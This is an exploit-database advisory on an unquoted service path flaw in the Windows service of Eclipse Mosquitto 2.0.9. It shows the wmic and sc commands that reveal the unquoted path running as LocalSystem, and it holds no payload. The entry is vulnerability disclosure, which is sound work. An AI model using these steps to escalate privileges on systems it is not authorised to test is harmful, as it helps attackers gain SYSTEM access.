Share
## https://sploitus.com/exploit?id=PACKETSTORM:161872
# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path  
# Discovery by: Riadh Bouchahoua   
# Discovery Date: 19-03-2021  
# Vendor Homepage: https://mosquitto.org/  
# Software Links : https://mosquitto.org/download/  
# Tested Version: 2.0.9  
# Vulnerability Type: Unquoted Service Path  
# Tested on OS: Windows 10 64 bits  
  
# Step to discover Unquoted Service Path:  
  
  
  
====  
  
C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"  
mosquitto C:\Program Files\mosquitto\mosquitto.exe run   
  
====  
  
C:\Users\Admin>sc qc mosquitto  
[SC] QueryServiceConfig réussite(s)  
  
SERVICE_NAME: mosquitto  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Mosquitto Broker  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem